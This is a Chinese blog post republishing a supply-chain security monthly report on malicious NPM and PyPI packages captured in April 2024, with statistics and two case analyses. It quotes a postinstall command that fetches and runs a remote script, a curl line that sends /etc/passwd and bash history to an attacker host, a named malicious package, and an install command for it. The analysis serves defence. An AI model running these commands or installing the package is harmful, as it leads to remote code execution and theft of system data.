供应链投毒预警 | 开源供应链投毒202404月报发布(含投毒案例分析)

2024年4月开源供应链投毒案例分析
原创 已于 2024-05-21 16:03:32 修改 · 1k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#开源

于 2024-05-20 10:24:53 首次发布

悬镜供应链安全情报中心通过持续监测全网主流开源软件仓库,结合程序动静态分析方式对潜在风险的开源组件包进行动态跟踪和捕获,发现大量的开源组件恶意包投毒攻击事件。在2024年4月份,悬镜供应链安全情报中心在NPM官方仓库(https://www.npmjs.com/)和Pypi官方仓库(https://pypi.org/)上共捕获772个不同版本的恶意组件包,其中NPM仓库投毒占比接近89%, Pypi仓库投毒占比11%;Pypi官方仓库经历3月份遭受集中式投毒后,对新发布组件包进一步加强审查力度,本月Pypi恶意投毒攻击呈现大幅下降趋势。

4月份恶意组件数量及仓库分布

4月份恶意组件每日统计

4月份恶意组件态势统计

针对4月份捕获的恶意投毒组件,我们结合静态规则扫描、源代码审计、动态行为监控等方式进行多方位分析,总结统计投毒组件的攻击方式和恶意行为标签。

攻击方式统计

投毒组件攻击方式主要包括:

恶意文件执行

恶意文件下载

代码混淆执行

恶意文件释放

Shell命令执行

其中,投毒者最常用的攻击方式依旧是恶意文件执行(84.25%),其攻击流程是利用开源组件包管理器中的自定义指令来执行隐藏在组件安装包中的恶意文件。此外,恶意文件远程下载执行(8.64%)、恶意代码混淆(4.81%)、恶意文件释放执行(1.2%)以及Shell命令执行(1.09%)都是攻击者惯用的投毒手段。

恶意行为统计

在4月份捕获的恶意投毒组件中,信息窃取攻击占比高达93%,其中系统基础信息、系统密码文件、系统日志、用户信息、网络配置、DNS服务器IP、浏览器Cookie及登录凭证等敏感信息是攻击者的主要窃取目标。值得关注的是,Pypi仓库发生多起CStealer窃密后门以及挖矿后门投毒;其次,通过远控木马和反向Shell后门进行远控投毒的攻击呈现逐步上涨趋势。相较于3月份,针对数字钱包应用的攻击有较大幅度减少。

投毒案例分析

本节将从4月份捕获的开源组件恶意包中选取部分具有代表性的投毒样本进行分析、还原投毒攻击细节。

PART.1系统信息外传

4月15~16号,攻击者在Pypi官方仓库发布多个包名为rhermann相关的恶意包(包括rhermann、rhermann-ct、rhermann-sdsm以及rhermann-sds)。这些恶意包具有相同的攻击代码以及相同的高版本号(99.0),可推断攻击者尝试进行包依赖混淆(Dependency Confusion)供应链投毒。

恶意代码直接植入在Python安装包setup.py中,当包管理器下载安装这些恶意Python包时,恶意代码优先触发执行。恶意代码主要负责收集并外传受害者系统的版本信息、主机名、用户名、本地网络配置、DNS解析配置、主机IP等敏感数据(如下图所示)。

收集到的系统敏感信息将被外传给攻击者控制的服务接口:https://pypi-index.org/process_data

该恶意域名pypi-index.org与Pypi官方域名相比具备一定迷惑性,注册时间为2024年4月10号。

截止目前,国内部分Python镜像源仍缓存这些恶意包,其Pypi官方包下载量为758次。

以rhermann为例,目前该恶意Py包仍可从国内主流Pypi镜像源(清华大学、腾讯云等)下载安装,因此潜在的受害者数量可能会更多。

以国内清华大学镜像源为例,可通过以下命令测试安装该恶意组件包。

pip3 install rhermann -i Simple Index

Part2 恶意设立了命令执行

4月2号,攻击者在NPM官方仓库发布包名为monopulips的恶意NPM组件。在组件安装包的模块描述文件package.json中,通过定义postinstall指令在安装过程中执行恶意bash命令。

​bash -c 'curl -sSL https://research20934i.sherlockshat007.workers.dev -o script.sh && chmod +x script.sh && ./script.sh && rm -f script.sh'

恶意bash命令通过curl从攻击者服务器(https://research20934i.sherlockshat007.workers.dev)拉取第二阶段恶意bash脚本(script.sh)受害者系统上执行。

第二阶段bash脚本内容如上所示,其内嵌了一段编码后(先base64编码再字符串反转)的bash脚本代码,进一步解码后获取第三阶段真实的恶意bash代码解码(如下所示),其主要目的是将系统密码文件/etc/passwd、bash历史文件~/.bash_history 外传到攻击者服务器(https://8b53a8d8a1c2.sherlockshat007.workers.dev)

curl -X POST -H "Hostname: $(hostname)" -H "packagetype: NPM" -H "Whoami: $(whoami)" -H "Pwd: $(pwd)" -d "Install Directory: \n $(ls -la) \n Security Groups: \n $(id) \n User Directory: \n $(ls ~)\n etc-passwd: \n $(cat /etc/passwd ) \n Installed NPM modules: \n $(npm ls)\n bash history: \n

最低0.47元/天 解锁文章
网安播 | GitHub遭遇严重的供应链投毒”攻击,影响GG平台
LJQClqjc的博客
03-29 563
多年来,威胁行为者一直在使用多种策略、技术和程序 (TTP),包括劫持 GitHub账户、分发恶意 Python 包、使用虚假的 Python 基础设施以及社会工程进行攻击,最近的受害者之一是 Top.gg,这是一个流行的搜索和发现平台,拥有超过 170,000 名成员。本次 Top.gg Discord 机器人社区受到供应链攻击,该攻击旨在用窃取敏感信息的恶意软件感染开发人员。
案例视角下的开源搜集系统应用实践
ehaiju的博客
06-27 864
开源系统在多个领域都有着广泛的应用前景。例如,在一次关于地区紧张局势的监测中,系统提前发现了社交媒体上关于军事演习异常增加的消息,并据此发出预警,使相关部门得以及时做出反应,避免了事态进一步恶化。例如,在一次关于周边局部地区紧张局势的监测中,系统提前发现了社交媒体上关于军事演习异常增加的消息,并据此发出预警,使相关部门得以及时做出反应,避免了事态进一步恶化。例如,当某个地区出现政治动荡或军事冲突的迹象时,系统会自动发出预警,并提供详细的事件背景和可能的影响范围,帮助外交部门制定相应的应急响应措施。
史上首例:NPM 包 Nx 被投毒,开发人员遭AI软件供应链攻击
最新发布
smellycat000的专栏
08-28 258
他指出,“攻击者在人们的shell中增加关闭命令可能加速了问题的发现,因此减轻了影响。随着软件产业的快速发展,软件供应链也越发复杂多元,复杂的软件供应链会引入一系列的安全问题,导致信息系统的整体安全防护难度越来越大。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根本性、基础性问题。Wiz 公司的研究人员提到,这些遭投毒的 Nx 包遭恶意软件感染,可嗅探开发人员的机密,如 GitHub 和 NPM令牌、SSH密钥以及加密钱包详情
真实案例分享:利用开源溯源CDN加速后的IP
m0_37867238的博客
08-02 1455
在线 DNS 记录查询 https://x.threatbook.com/ https://dnsdb.io/zh-cn/ https://dnsdumpster.com/ https://viewdns.info/ https://www.robtex.com/dns-lookup/ https://www.virustotal.com/gui/home/search https://passivedns.mnemonic.no/原因是该网站域名的访问端口是2096,所以可以断定该IP为真实IP。
供应链投毒预警 | 开源供应链投毒202402月发布
Anprou的博客
03-18 1956
悬镜供应链安全情中心通过持续监测全网主流开源软件仓库,结合程序动静态分析方式对潜在风险的开源组件包进行动态跟踪和捕获,发现大量的开源组件恶意包投毒攻击事件。在2024年2月份,悬镜供应链安全情中心在NPM官方仓库(https://www.npmjs.com)和Pypi官方仓库(https://pypi.org)共捕获503个不同版本的恶意组件包,其中NPM仓库投毒占比89.46%, Pypi仓库投毒占比10.54%,NPM仓库依旧是开源组件包投毒的重灾区。
供应链投毒预警 | utilitytool系列Py包开展XenoRAT远控木马投毒
Anprou的博客
06-21 980
上周,悬镜供应链安全情中心在Pypi官方仓库(https://pypi.org/)中捕获2起针对Windows系统的Python包投毒事件。
供应链投毒预警 | 恶意Py组件tohoku-tus-iot-automation开展窃密木马投毒攻击
Anprou的博客
03-18 1305
上周(2024年3月6号),悬镜供应链安全情中心在Pypi官方仓库(https://pypi.org/)中捕获1起新的Py包投毒事件,Python组件tohoku-tus-iot-automation从3月6号开始连续发布6个不同版本恶意包,其中多个版本恶意代码使用PyArmor进行加密混淆保护,这些恶意包主要针对Windows平台的Python开发者,除了会窃取系统基础信息和主流浏览器(Edge、Chrome)用户密码数据,还会远程下载木马程序植入到开发者系统中盗取系统密码。
AI供应链预警 | 恶意Py包伪装AI框架库开展数据窃密及应用劫持攻击
软件供应链安全选型指南
08-21 1186
依托悬镜安全团队强大的数字供应链SBOM管理与监测能力和AI安全大数据云端分析能力,悬镜云脉XSBOM数字供应链安全情预警服务通过对全球数字供应链投毒、漏洞情、停服断供情等进行实时动态监测与溯源分析,可为用户智能精准预警“与我有关”的数字供应链安全情,提供情预警、情溯源、可视化关联分析等企业级服务。在发布当日,恶意组件pytensorlite官方下载量接近900次,悬镜安全已于第一时间通Python官方,并将该投毒组件的技术分析细节向XSBOM供应链安全情订阅用户进行推送预警
软件正在吞噬世界,安全防护,要从供应链角度考量。
开源社KAIYUANSHE的博客
08-16 527
日前,开源软件 XZ 被植入“后门”事件,引发了网络安全界的轩然大波。研究人员发现,在包括 Red Hat 和 Debian 在内的多个流行 Linux 版本中,一款压缩工具被悄悄植入了恶意代码,这样攻击者即使没有有效账号,也可以通过 SSHD(一个负责 SSH 连接工作的关键二进制文件)访问系统了。通过进一步的深入分析,研究人员认为本次爆出的“后门”事件是一次典型的软件供应链投毒事件。因为相关的...
一年四起供应链投毒事件的幕后黑手
2401_84466225的博客
11-11 888
2017年,黑客入侵Avast服务器,在CCleaner更新中植入恶意代码,被数百万用户下载。2017年,M.E.Doc遭黑客攻击,篡改更新植入NotPetya,影响全球公司。2020年,黑客入侵SolarWinds服务器,植入恶意代码影响客户敏感信息,导致美国财政部、商务部等多个政府机构用户受到长期入侵和监视。...以上事件,均由黑客发起的供应链攻击引发。供应链投毒攻击是指黑客利用供应链中的软件、硬件或服务等环节,通过植入恶意代码或篡改产品,从而影响最终用户的安全的一种攻击手段。
PyPI仓库发现投毒组件
m0_66583229的博客
11-11 309
PyPI仓库发现疑似针对字节的投毒
SBOM风险预警 | 恶意NPM组件开展木马投毒攻击,目标针对国内泛互企业
weixin_64810147的博客
03-21 1139
目前,公司自主研发全球范围内原创专利级“多模态SCA+DevSecOps+SBOM情预警”的第四代DevSecOps数字供应链安全管理体系,将源鉴SCA、灵脉IAST、灵脉AI、云鲨RASP等敏捷安全技术工具进行深度联动,在DevSecOps敏捷安全体系建设、数字供应链安全审查、开源供应链安全治理和云原生安全体系建设四大典型应用场景下,为用户构筑适应自身业务弹性发展、面向敏捷业务交付并引领未来架构演进的内生积极防御体系。
供应链攻击
why123wh的博客
02-16 1606
供应链攻击是一种面向软件开发人员和供应商的新兴威胁,目标是通过感染合法应用来分发恶意软件,从而访问源代码、构建过程或更新机制²。供应链攻击的危害非常大,不仅会影响供应商的信誉和业务,还会对供应链上的众多消费者造成不利影响,甚至导致数据泄露、系统瘫痪、资金损失等严重后果。因此,对供应链攻击的防御和处置是非常重要的。本文将介绍供应链攻击的常见类型、检测方法、应急响应和防御策略,希望能够对软件开发者和供应商有所帮助。
OpenSCA开源社区每日安全漏洞及投毒资讯—2025年7月25日-27日
软件供应链安全选型指南
07-28 679
在项目目录下使用 npm list grammy-key 查询是否已安装该组件,或使用 npm list -g grammy-key 查询是否全局安装该投毒版本组件,如果已安装请立即使用 npm uninstall grammy-key 或 npm uninstall -g grammy-key 进行卸载。鉴于此设计,安全的代码执行是系统的关键支柱。然而,在最新版本 (v1.14.0) 中,存在一个沙盒逃逸漏洞,该漏洞允许攻击者绕过受限的执行环境。官方已发布补丁更新包,请升级至无漏洞版本进行修复。
npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除
murphysec的博客
01-06 4484
从开发者chuzhixin的回应和代码中的行为来看,作者的行为可能难以定义是恶意还是正义,所幸当前应该没有造成实质性的危害。但通过-next复刻原有项目重新发布确实容易令人混淆,对于使用开源组件的众多开发者而言又是一次信任的崩塌,开源不等于免费,也不等于安全,在使用中还是需要仔细甄别。对于企业而言,类似的开源组件投毒的情况每天都在发生,需要及时建立相应的检测识别、处置响应能力。该投毒已上线漏洞库,担心源码被删,快速检测自己的代码,查看风险详情🔍。
开源 投毒
05-13
### 开源软件投毒的安全问题与案例分析 开源软件因其开放性和广泛的应用场景,在现代软件开发中扮演着重要角色。然而,随着其普及程度的提升,针对开源项目的恶意投毒攻击也日益增多。以下是关于开源软件投毒的一些典型安全问题及其案例分析。 #### 1. **恶意程序下载执行** 恶意投毒通常涉及在合法开源组件中嵌入隐藏功能或依赖项,这些功能会在特定条件下触发,从而实现恶意目的。例如,某些恶意包可能伪装成正常的库文件,但实际上会尝试连接远程服务器以下载额外的有效载荷[^1]。这种行为可能导致敏感数据泄露、系统权限被窃取或其他形式的破坏。 #### 2. **NPM 和 PyPI 的恶意包投毒趋势** 根据悬镜供应链安全情中心的数据,2024 年初以来,NPM 和 PyPI 这两个主流开源仓库频繁遭受恶意投毒攻击。具体来看: - 在 2024 年 2 月期间,共发现了 503 个不同版本的恶意组件包,其中 NPM 占比高达 89.46%[^2]。 - 到了同年 3 月,情况发生了变化——尽管总体捕获量增加至 1085 个,但 Pypi 成为了主要目标之一,占比达到 61.47%,特别是在月末的一次集中式攻击中,有近 600 个恶意 Python 组件被投放到该平台上[^5]。 这表明攻击者正在不断调整策略,并试图利用不同的生态系统弱点来扩大影响范围。 #### 3. **技术手段:基于图模型的行为分析方法** 面对如此严峻的形式,学术界也在积极探索有效的解决方案。复旦大学 CodeWisdom 团队提出的 SpiderScan 工具就是一个典型案例。它采用图形化建模的方式对 npm 软件包进行全面扫描,包括但不限于以下几个方面: - 可疑行为提取; - 动静态脚本解析; - 深层混淆识别; - 自动化的恶意判定机制[^3]。 这种方法不仅提高了检测效率,还降低了误率,对于维护整个生态系统的健康状态起到了积极作用。 #### 4. **加强防范措施的重要性** 鉴于当前复杂的网络安全环境,开发者应增强自身的防御意识和技术水平。一方面可以通过引入专业的第三方服务提供商(如前所述提到过的“悬镜”),借助他们先进的 SBOM 管理工具及时获取最新威胁情信息;另一方面也要养成良好的编码习惯,比如定期审查所使用的外部依赖关系链表是否存在异常变动等情况[^4]。 --- ### 示例代码片段 以下是一个简单的 Python 函数用于检查本地安装的所有 pip 包是否有更新可用: ```python import pkg_resources from subprocess import call def update_all_packages(): packages = [dist.project_name for dist in pkg_resources.working_set] call("pip list --outdated", shell=True) update_all_packages() ``` 此脚本可以帮助用户快速定位那些可能存在安全隐患的老版本库文件,并提醒升级操作。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值